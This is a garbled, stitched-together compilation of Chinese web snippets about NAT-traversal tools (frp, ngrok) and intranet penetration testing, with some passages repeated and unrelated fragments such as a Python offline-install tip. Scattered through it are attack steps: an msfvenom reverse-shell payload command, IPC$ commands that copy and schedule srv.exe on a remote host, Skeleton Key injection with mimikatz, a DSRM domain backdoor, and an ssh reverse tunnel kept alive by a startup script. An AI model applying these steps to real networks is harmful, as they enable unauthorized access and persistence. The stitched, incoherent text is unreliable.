服务端需要公网环境,一般用一台云服务器就行了,我选择的是 Linux 服务器,Windows 服务器也是可以的。
内网穿透 目录 内网穿透 内网穿透工具 学了网络之后,我们知道了公网和私网。私网是不能在公网传输和通信的。我们一个学校,一个小区,都是在自己单独的私网里面。 内网穿透 这就要说到内网穿透了! 如下图,有这么一个环境。小明和小王分别是清华和北大的学生。他们都各自处在自己学校的内网中,他们的ip地址可以是一样的,都是192.168.10.2。 因为在路由器体内有一个私网ip和端口的对照表,每个私网ip对应一个端口,所以根据端口就能知道消息是发送给内网中的哪台主机了。 192.168.10.10:22222 <——> 10000 当我们访问百度这个事情做完之后的一定时间内,Session记录就会在路由器的体内消失,这个10000端口可以继续分配给其他用户 那么现在我们再来分析一下位于内网中的我们如何和同样是内网中的小伙伴通过 内网穿透工具 常用的内网穿透的工具有:NAT APP基于ngrok的国内高速内网转发工具 这款软件可以把你内网的ip和端口映射成一个公网的ip和端口,这样,我们就可以实现内网穿透了!
内网穿透 目录 内网穿透 内网穿透工具 学了网络之后,我们知道了公网和私网。私网是不能在公网传输和通信的。我们一个学校,一个小区,都是在自己单独的私网里面。 内网穿透 这就要说到内网穿透了! 如下图,有这么一个环境。小明和小王分别是清华和北大的学生。他们都各自处在自己学校的内网中,他们的ip地址可以是一样的,都是192.168.10.2。 因为在路由器体内有一个私网ip和端口的对照表,每个私网ip对应一个端口,所以根据端口就能知道消息是发送给内网中的哪台主机了。 那么现在我们再来分析一下位于内网中的我们如何和同样是内网中的小伙伴通过QQ通信。 内网穿透工具 常用的内网穿透的工具有:NAT APP基于ngrok的国内高速内网转发工具 这款软件可以把你内网的ip和端口映射成一个公网的ip和端口,这样,我们就可以实现内网穿透了!
内网也指局域网,是指某一区域内由多台计算机互联而成的计算机组,组网的范围通常是数千米内。 ? ? 在用路由器连接的内网中,可以将网络划分为三个区域:安全级别最高的内网;安全级别中等的DMZ;安全级别最低的外网(Internet)。 ? ? 在配置一个拥有DMZ的网络时,通常需要定义如下访问控制策略 内网可以访问外网:内网用户需要自由地访问外网。 DMZ不能访问内网:如不执行,攻击者攻陷DMZ时,厄尼旺将无法收到保护 DMZ不能访问外网:有例外 内网可以分为办公区和核心区(横向移动攻击的优先查找目标) 域中计算机的分类 域控制器 附带一份内网学习思维导图 ? ?
在用路由器连接的内网中,可以将网络划分为三个区域:安全级别最高的内网;安全级别中等的DMZ;安全级别最低的外网(Internet)。 ? 在配置一个拥有DMZ的网络时,通常需要定义如下访问控制策略 内网可以访问外网:内网用户需要自由地访问外网。 防火墙需要进行NAT 内网可以访问DMZ:此策略时用户可以使用或者管理DMZ中地服务器 外网不能访问内网:防火墙的基本策略,如需访问,通过V**的方式 外网可以访问DMZ:需要由防火墙来完成对外地址到服务器实际地址的转换 DMZ不能访问内网:如不执行,攻击者攻陷DMZ时,厄尼旺将无法收到保护 DMZ不能访问外网:有例外 内网可以分为办公区和核心区(横向移动攻击的优先查找目标) 域中计算机的分类 域控制器 附带一份内网学习思维导图 ?
三、汇总整理了10个内网穿透工具方法 内网穿透工具在现代数字化生活中扮演着不可或缺的角色,成为了众多用户解决无公网IP跨网互通互连的便捷之选。 无论是在远程办公、智能家居管理,还是本地开发调试等场景中,内网穿透都能为我们提供便捷、稳定、高效的内网穿透解决方案。这里附上常见10种内网穿透软件方法,希望能够帮到有需要的你: 1. 使用FRP进行内网穿透 FRP是一款开源的内网穿透工具,它可以帮助用户在没有公网IP或动态IP的情况下访问内网应用。 用户只需要在内网机器和公网机器上安装WireGuard客户端,并进行相应的配置,即可实现内网穿透。WireGuard支持多种平台,并提供了高度安全的加密机制,保护用户的数据不受攻击。 10. 通过以上10种方法,用户可以选择合适的内网穿透工具,轻松实现远程访问内网应用的需求。这些工具都提供了简单易用的界面和配置方式,即使是没有技术背景的用户也可以轻松上手。
image.png 视频内容 内网渗透之内网隧道构建 1080P超清版 微信公众号平台本身会对素材进行二次压缩,会导致画面出现不清晰等情况。
文章前言 随着企业信息化程度的加深,内网环境逐渐成为攻击者的关注的重点目标,在内网渗透的过程中权限维持是不可或缺的关键环节之一,它往往决定了攻击者能否在目标系统中长时间潜伏,获取敏感信息或者造成更大范围的破坏 本文旨在深入探讨内网渗透中的权限维持技术,包括其基本概念、常见手段以及防御措施 权限维持 DSRM域后门 基本介绍 DSRM(Directory Services Restore Mode,目录服务恢复模式 Users\Al1ex.HACKE\Desktop\Al1ex.pfx Step 4:然后把pfx文件拷贝到我们自己的计算机,双击导入,输入刚刚我们输的密码 Step 5:然后在我们本地的计算机做个代理进内网 ,并且把DNS也代理进去(dns设置为内网的域控) Step 6:使用Kekeo获取用户的NTLM tgt::pac /subject:Al1ex /castore:current_user /domain ,其实内网主机有window,也有Linux,所以读者不用过于局限于内网手法进行权限维持(当然这种作为首选属实极好),至于window下的一系列维权也可以进行尝试操作,例如:WMI后门、CLR维权、COM
前言: 内网穿透的方式不少,有人会也有人不太懂,最简单的,对新手友好的就是花生壳,但是要钱,对穷人不友好,这里我们就用操作稍微有点麻烦的但是免费的frp。 (这里不讲配置的一些理论理解了,麻烦,大家可以百度内网穿透的理论知识) 我们需要生成一下木马文件 msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp
原理:当拿到域控权限后,使用mimikatz可以注入Skeleon Key,将 Skeleton Key 注入域控制器的 lsass.exe 进程,这样会在域内的所有账号中添加一个相同的 Skeleton Key,而这个key是自己设定的所以可以随时共享访问。
即使用139(TCP)端口;而在Windows2000中,SMB除了基于NBT实现,还可以直接通过445端口实现 IPC$入侵,即通过使用Windows系统默认启动的IPC$共享获得计算机控制权的入侵,在内网中及其常见 127.0.0.25\ipc$ #复制srv.exe到目标主机 D:>copy srv.exe \127.0.0.25\ipc$ #查时间 D:>net time\127.0.0.25 #用at命令在10 点50分启动srv.exe(注意这里设置的时间比主机时间快) D:>at \127.0.0.25 10:50 srv.exe 上述命令中的at就是让计算机在指定的时间做指定事情的命令(例如运行程序)
127.0.0.1(也可选择其他电脑地址)和端口号,映射端口号填0,让系统默认选择映射端口号(如下图所示,默认为20011) (6)使用选择的服务器IP(第3步)和映射端口号(第5步),即可通过外网(阿里云)访问内网端口 (目前只支持TCP协议-含https、http、ssh等) 通过 http://39.108.221.136:20011进行访问内网设备
⚠️ 此方法会把内网远程桌面服务暴露在外网,安全风险请自行评估! 操作步骤 前提条件,当然是需要打开被远程的 Win10 系统的远程桌面的访问功能... ,然后在目标 win10 主机上,使用自带的openssh 软件运行ssh反向代理命令: ssh -R *:3389:127.0.0.1:3389 root@jokeysoft.com 就可以通过 “ Users\dell\start_ssh_tunnel.bat" & Chr(34), 0 Set WshShell = Nothing 将 start_ssh_tunnel.vbs 脚本文件放至 Win10 Start Menu\Programs\Startup 全局生效目录: %ProgramData%\Microsoft\Windows\Start Menu\Programs\StartUp Win10 反向代理的外网地址和端口就可以使用 ssh 实现的内网穿透来远程局域网的主机了。
0x02 chisel进行远程桌面代理 首先需要两台windows主机和一台VPS,在这里使用VPS作为chisel服务器端,然后使用win7作为内网主机,使用win10作为我们的攻击者主机。 socks代理,然后使用SocksCap等工具进行内网扫描或者内网渗透。 这就导致一个问题,如果我直接在VPS上执行完命令之后,默认监听127.0.0.1的1080端口,这样的话,我只能用VPS去访问内网主机,如果想要在win10上通过SocksCap设置代理访问内网是行不通的 socks流量实现对内网主机的访问。 (3):使用Socks代理访问内网 使用浏览器 ? ? 成功访问到内网的通达OA。 使用SocksCap进行内网访问 ? 代理搭建成功,流量可以正常进入内网。
我的外网是win10 64位,内网环境win7 32位。由于未知原因,anaconda无法安装!!! 其实最靠谱的安装三方包的还是whl包。 第一步,安装一个与内网环境完全相同的python版本,以我为例,外网额外安装python3.6 32位(64位系统可以安装32位程序)。那怎么解决兼容问题呢? 第三步,将whl复制到内网中,按照依赖关系手动pip 安装。 tips:在命令行中可以用tab补全命令。针对whl非常长的文件名,可以通过先打几个字母,再通过tab补全。 tips:只要外网内网python版本一样,外网安得上的包,内网一定可以。
0x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。 某内网靶场的详细教程:Vulnstack(一) 内网渗透过程中经常会涉及到内网穿透,如何理解内网穿透以及端口转发、端口映射等相关知识可以参考:如何从零构建对内网穿透的理解 实操部分写的比较草率,主要是为了增强认知 一个是为了保障安全(内网与外网相隔绝),另一个就是资源共享,毕竟大家都是一条船上的人。SMB 协议就是用于实现各种资源的共享的,其中就包括IPC连接中的命名管道。 利用场景: 已拿下内网中一台主机的权限(webserver),掌握该主机的域用户名和密码,知道域内其他用户名。
前言 在内网渗透过程中,会碰到远程控制soft或者其他,这里针对远程控制软件做如下总结。 远程控制软件 向日葵篇 向日葵查看版本 向日葵(可以攻击) 针对向日葵的话其实如果有本地安装的话,是... 前言 在内网渗透过程中,会碰到远程控制soft或者其他,这里针对远程控制软件做如下总结。
无论是通过外网打点,还是水坑钓鱼,进入内网后的第一步,也是最重要的一步就是信息收集,而且信息收集往往是一直穿插在整个内网渗透过程中。 workstation =工作组特征=------------------------------------------------软件版本 Windows 10 %I | findstr "TTL=" >> pinglive.txt 扫描的话建议直接在内网进行扫描,速度和准确率都比较有保障。 常用的工具[最多10秒一个c段]:nbtscan[基于smb和netbios的内网主机发现方式]、Ladon、自开发工具socks代理扫描:goby 域内信息收集 下文仅限于域内的信息收集,均不会涉及域内认证原理等概念 这里直接介绍需要在内网机器中执行的相关命令: 此工具的导出相对来说比较暴力,且目前此工具 exe 原版已经被识别并被各种杀软查杀,包括微软win10自带的杀软 Windows Defender 。
大家好,又见面了,我是你们的朋友全栈 frp点对点udp方式内网穿透ssh,节省服务器流量 (2019 年 5 月 30 日) frp ssh 安全连接和服务器安全设置 (2019 年 5 月 29 日) frp 控制台监控dashboard配置 (2019 年 5 月 27 日) frp内网穿透 公网访问本地web服务 (2019 年 5 月 26 日) frp安装教程 穿透SSH (2019 年 5 月 25 日) frp内网穿透简介 (2019 年 5 月 25 日) frp简介 frp 是一个内网穿透工具。 我们的电脑IP一般为192.168.0.103 这个叫内网IP,外面的电脑无法访问的。 frp进行的网络穿透原理图 frp穿透的用途 1. 在办公室访问家里的电脑,反之亦然 2.
前言 整理下内网渗透的思路 一、整体概述 1、攻击思路 攻击思路主要有2种: 攻击外网服务器,获取外网服务器的权限,接着利用入侵成功的外网服务器作为跳板,攻击内网其他服务器,最后获得敏感数据,并将数据传递到攻击者 攻击办公网的系统、办公网电脑、办公网无线等方式,一般是采用社工,实现控制办公电脑,再用获得的办公网数据,可能是内网的各种登录账号和密码,再获取办公网或者生产网的有用数据。 一般内网安全检查使用第一种思路,实际的攻击2种思路结合实现。 内网的通用类应用比较常见的问题是弱口令,如果一个管理员可以登录几个系统,那在这几个系统的账号、密码也基本上是一样的。 smtps) 攻击方式: 爆破:弱口令 未授权访问 9、POP3协议 默认端口:109(POP2)、110(POP3)、995(POP3S) 攻击方式: 爆破;弱口令 未授权访问 10